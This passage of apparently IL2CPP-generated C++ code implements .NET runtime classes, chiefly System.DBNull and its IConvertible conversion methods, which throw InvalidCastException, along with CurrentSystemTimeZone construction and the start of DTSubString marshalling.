s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (CurrentSystemTimeZone__ctor_m19D1DDA56D25F55B9EF411773A18CC0914DA61C4_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(TimeZone_tA2DF435DA1A379978B885F0872A93774666B7454_il2cpp_TypeInfo_var); TimeZone__ctor_mBD56855E65E61A15C21F434032207DF5469CEF31(__this, /*hidden argument*/NULL); TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * L_0 = TimeZoneInfo_get_Local_mD208D43B3366D6E489CA49A7F21164373CEC24FD(/*hidden argument*/NULL); __this->set_LocalTimeZone_1(L_0); return; } } // System.Boolean System.CurrentSystemTimeZone::GetTimeZoneData(System.Int32,System.Int64[]&,System.String[]&,System.Boolean&) extern "C" IL2CPP_METHOD_ATTR bool CurrentSystemTimeZone_GetTimeZoneData_m24EC5AA1CB7F2E2809CE4C2EE66FDB062C2EAFCF (int32_t ___year0, Int64U5BU5D_tE04A3DEF6AF1C852A43B98A24EFB715806B37F5F** ___data1, StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** ___names2, bool* ___daylight_inverted3, const RuntimeMethod* method) { typedef bool (*CurrentSystemTimeZone_GetTimeZoneData_m24EC5AA1CB7F2E2809CE4C2EE66FDB062C2EAFCF_ftn) (int32_t, Int64U5BU5D_tE04A3DEF6AF1C852A43B98A24EFB715806B37F5F**, StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E**, bool*); using namespace il2cpp::icalls; return ((CurrentSystemTimeZone_GetTimeZoneData_m24EC5AA1CB7F2E2809CE4C2EE66FDB062C2EAFCF_ftn)mscorlib::System::CurrentSystemTimeZone::GetTimeZoneData40) (___year0, ___data1, ___names2, ___daylight_inverted3); } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.DBNull::.ctor() extern "C" IL2CPP_METHOD_ATTR void DBNull__ctor_m9A9476BA790C3C326D5322BDB552DBBD2DAD5996 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, const RuntimeMethod* method) { { Object__ctor_m925ECA5E85CA100E3FB86A4F9E15C120E9A184C0(__this, /*hidden argument*/NULL); return; } } // System.Void System.DBNull::.ctor(System.Runtime.Serialization.SerializationInfo,System.Runtime.Serialization.StreamingContext) extern "C" IL2CPP_METHOD_ATTR void DBNull__ctor_m65FBEA4E461D29FD277A21BEAA693BD11DF7D3C9 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * ___info0, StreamingContext_t2CCDC54E0E8D078AF4A50E3A8B921B828A900034 ___context1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull__ctor_m65FBEA4E461D29FD277A21BEAA693BD11DF7D3C9_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Object__ctor_m925ECA5E85CA100E3FB86A4F9E15C120E9A184C0(__this, /*hidden argument*/NULL); String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral0BD33FDF3EDF96B20C8F243E32B177CA52FB1519, /*hidden argument*/NULL); NotSupportedException_tE75B318D6590A02A5D9B29FD97409B1750FA0010 * L_1 = (NotSupportedException_tE75B318D6590A02A5D9B29FD97409B1750FA0010 *)il2cpp_codegen_object_new(NotSupportedException_tE75B318D6590A02A5D9B29FD97409B1750FA0010_il2cpp_TypeInfo_var); NotSupportedException__ctor_mD023A89A5C1F740F43F0A9CD6C49DC21230B3CEE(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull__ctor_m65FBEA4E461D29FD277A21BEAA693BD11DF7D3C9_RuntimeMethod_var); } } // System.Void System.DBNull::GetObjectData(System.Runtime.Serialization.SerializationInfo,System.Runtime.Serialization.StreamingContext) extern "C" IL2CPP_METHOD_ATTR void DBNull_GetObjectData_m016A085169FBF833FC9E299490B6BB5CE5D1BDDF (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * ___info0, StreamingContext_t2CCDC54E0E8D078AF4A50E3A8B921B828A900034 ___context1, const RuntimeMethod* method) { { SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * L_0 = ___info0; UnitySerializationHolder_GetUnitySerializationInfo_m86F654140996546DB4D6D8228BF9FE45E9BAEC3E(L_0, 2, (String_t*)NULL, (RuntimeAssembly_t5EE9CD749D82345AE5635B9665665C31A3308EB1 *)NULL, /*hidden argument*/NULL); return; } } // System.String System.DBNull::ToString() extern "C" IL2CPP_METHOD_ATTR String_t* DBNull_ToString_mA97EAD399B15473466B66DEFB53FC261A00BE785 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_ToString_mA97EAD399B15473466B66DEFB53FC261A00BE785_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ((String_t_StaticFields*)il2cpp_codegen_static_fields_for(String_t_il2cpp_TypeInfo_var))->get_Empty_5(); return L_0; } } // System.String System.DBNull::ToString(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR String_t* DBNull_ToString_m57394DA26A502AAD19DBEAE045230CEB5F6FF236 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_ToString_m57394DA26A502AAD19DBEAE045230CEB5F6FF236_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ((String_t_StaticFields*)il2cpp_codegen_static_fields_for(String_t_il2cpp_TypeInfo_var))->get_Empty_5(); return L_0; } } // System.TypeCode System.DBNull::GetTypeCode() extern "C" IL2CPP_METHOD_ATTR int32_t DBNull_GetTypeCode_mA65EEE6FD352AA9B71AD3C254EC4BE4AF28DB655 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, const RuntimeMethod* method) { { return (int32_t)(2); } } // System.Boolean System.DBNull::System.IConvertible.ToBoolean(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR bool DBNull_System_IConvertible_ToBoolean_m0F9A794EAEF58C50CFF9ECEE2760C4C63A0371B7 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToBoolean_m0F9A794EAEF58C50CFF9ECEE2760C4C63A0371B7_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToBoolean_m0F9A794EAEF58C50CFF9ECEE2760C4C63A0371B7_RuntimeMethod_var); } } // System.Char System.DBNull::System.IConvertible.ToChar(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR Il2CppChar DBNull_System_IConvertible_ToChar_m5B7CF101F29BCEAC2B229D25F8ADD330BDBD0793 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToChar_m5B7CF101F29BCEAC2B229D25F8ADD330BDBD0793_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToChar_m5B7CF101F29BCEAC2B229D25F8ADD330BDBD0793_RuntimeMethod_var); } } // System.SByte System.DBNull::System.IConvertible.ToSByte(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int8_t DBNull_System_IConvertible_ToSByte_m858C48A31D48D55E63528C1FF77B32C6AB69BDDC (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToSByte_m858C48A31D48D55E63528C1FF77B32C6AB69BDDC_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToSByte_m858C48A31D48D55E63528C1FF77B32C6AB69BDDC_RuntimeMethod_var); } } // System.Byte System.DBNull::System.IConvertible.ToByte(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint8_t DBNull_System_IConvertible_ToByte_m8DEEB8376504FD41BE96151D41A8F9933F4C606F (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToByte_m8DEEB8376504FD41BE96151D41A8F9933F4C606F_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToByte_m8DEEB8376504FD41BE96151D41A8F9933F4C606F_RuntimeMethod_var); } } // System.Int16 System.DBNull::System.IConvertible.ToInt16(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int16_t DBNull_System_IConvertible_ToInt16_mF1F70AA5E7C2F3A8DFDA93C46CD1F757208FDEB1 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToInt16_mF1F70AA5E7C2F3A8DFDA93C46CD1F757208FDEB1_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToInt16_mF1F70AA5E7C2F3A8DFDA93C46CD1F757208FDEB1_RuntimeMethod_var); } } // System.UInt16 System.DBNull::System.IConvertible.ToUInt16(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint16_t DBNull_System_IConvertible_ToUInt16_mB4DFF398A4EB0E54E2CD632E9728D7162DA7A5EB (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToUInt16_mB4DFF398A4EB0E54E2CD632E9728D7162DA7A5EB_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToUInt16_mB4DFF398A4EB0E54E2CD632E9728D7162DA7A5EB_RuntimeMethod_var); } } // System.Int32 System.DBNull::System.IConvertible.ToInt32(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int32_t DBNull_System_IConvertible_ToInt32_mE953190F1847562CC0CF798BE0237D903DFF7E67 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToInt32_mE953190F1847562CC0CF798BE0237D903DFF7E67_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToInt32_mE953190F1847562CC0CF798BE0237D903DFF7E67_RuntimeMethod_var); } } // System.UInt32 System.DBNull::System.IConvertible.ToUInt32(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint32_t DBNull_System_IConvertible_ToUInt32_m4CFFCFF1F58EE869C907CC5A2C2421034A628B81 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToUInt32_m4CFFCFF1F58EE869C907CC5A2C2421034A628B81_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToUInt32_m4CFFCFF1F58EE869C907CC5A2C2421034A628B81_RuntimeMethod_var); } } // System.Int64 System.DBNull::System.IConvertible.ToInt64(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int64_t DBNull_System_IConvertible_ToInt64_m328C7202D595DF73985D48F2E6C3A8FD8E99977A (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToInt64_m328C7202D595DF73985D48F2E6C3A8FD8E99977A_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToInt64_m328C7202D595DF73985D48F2E6C3A8FD8E99977A_RuntimeMethod_var); } } // System.UInt64 System.DBNull::System.IConvertible.ToUInt64(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint64_t DBNull_System_IConvertible_ToUInt64_m0F1C8A9AF9BEE4E93FF637569D1A0A28F1C2C628 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToUInt64_m0F1C8A9AF9BEE4E93FF637569D1A0A28F1C2C628_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToUInt64_m0F1C8A9AF9BEE4E93FF637569D1A0A28F1C2C628_RuntimeMethod_var); } } // System.Single System.DBNull::System.IConvertible.ToSingle(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR float DBNull_System_IConvertible_ToSingle_m83559328EDDA097F34DE62755E9014D5DC226435 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToSingle_m83559328EDDA097F34DE62755E9014D5DC226435_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToSingle_m83559328EDDA097F34DE62755E9014D5DC226435_RuntimeMethod_var); } } // System.Double System.DBNull::System.IConvertible.ToDouble(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR double DBNull_System_IConvertible_ToDouble_m7E3A77F228DEF3C0291F43571632FF0ADD22A8AA (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToDouble_m7E3A77F228DEF3C0291F43571632FF0ADD22A8AA_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToDouble_m7E3A77F228DEF3C0291F43571632FF0ADD22A8AA_RuntimeMethod_var); } } // System.Decimal System.DBNull::System.IConvertible.ToDecimal(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 DBNull_System_IConvertible_ToDecimal_mC30B1FDB8D3F4165E400A919FC0C1D5A5A5E6F0B (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToDecimal_mC30B1FDB8D3F4165E400A919FC0C1D5A5A5E6F0B_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToDecimal_mC30B1FDB8D3F4165E400A919FC0C1D5A5A5E6F0B_RuntimeMethod_var); } } // System.DateTime System.DBNull::System.IConvertible.ToDateTime(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DBNull_System_IConvertible_ToDateTime_m3E8A9034AF13781C24C788FACCBD601637B73432 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToDateTime_m3E8A9034AF13781C24C788FACCBD601637B73432_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFA54022A2807F906EA2A1C207A9347F4A1BEF5AA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_1 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_1, L_0, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DBNull_System_IConvertible_ToDateTime_m3E8A9034AF13781C24C788FACCBD601637B73432_RuntimeMethod_var); } } // System.Object System.DBNull::System.IConvertible.ToType(System.Type,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR RuntimeObject * DBNull_System_IConvertible_ToType_m6DE5E30330953145F76EF4BC8C8446C61FFB5E6D (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, Type_t * ___type0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull_System_IConvertible_ToType_m6DE5E30330953145F76EF4BC8C8446C61FFB5E6D_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Type_t * L_0 = ___type0; RuntimeObject* L_1 = ___provider1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeObject * L_2 = Convert_DefaultToType_m899D5F6B9FE3E8B878BC56172C6BFE788B6C1BE3(__this, L_0, L_1, /*hidden argument*/NULL); return L_2; } } // System.Void System.DBNull::.cctor() extern "C" IL2CPP_METHOD_ATTR void DBNull__cctor_mC681597B5135AD25F2A598A96F2C7129C31283AE (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DBNull__cctor_mC681597B5135AD25F2A598A96F2C7129C31283AE_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * L_0 = (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 *)il2cpp_codegen_object_new(DBNull_t7400E04939C2C29699B389B106997892BF53A8E5_il2cpp_TypeInfo_var); DBNull__ctor_m9A9476BA790C3C326D5322BDB552DBBD2DAD5996(L_0, /*hidden argument*/NULL); ((DBNull_t7400E04939C2C29699B389B106997892BF53A8E5_StaticFields*)il2cpp_codegen_static_fields_for(DBNull_t7400E04939C2C29699B389B106997892BF53A8E5_il2cpp_TypeInfo_var))->set_Value_0(L_0); return; } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // Conversion methods for marshalling of: System.DTSubString extern "C" void DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshal_pinvoke(const DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D& unmarshaled, DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshaled_pinvoke& marshaled) { marshaled.___s_0 = il2cpp_codegen_marshal_string(unmarshaled.get_s_0()); marshaled.___index_1 = unmarshaled.get_index_1(); marshaled.___length_2 = unmarshaled.get_length_2(); marshaled.___type_3 = unmarshaled.get_type_3(); marshaled.___value_4 = unmarshaled.get_value_4(); } extern "C" void DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshal_pinvoke_back(const DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshaled_pinvoke& marshaled, 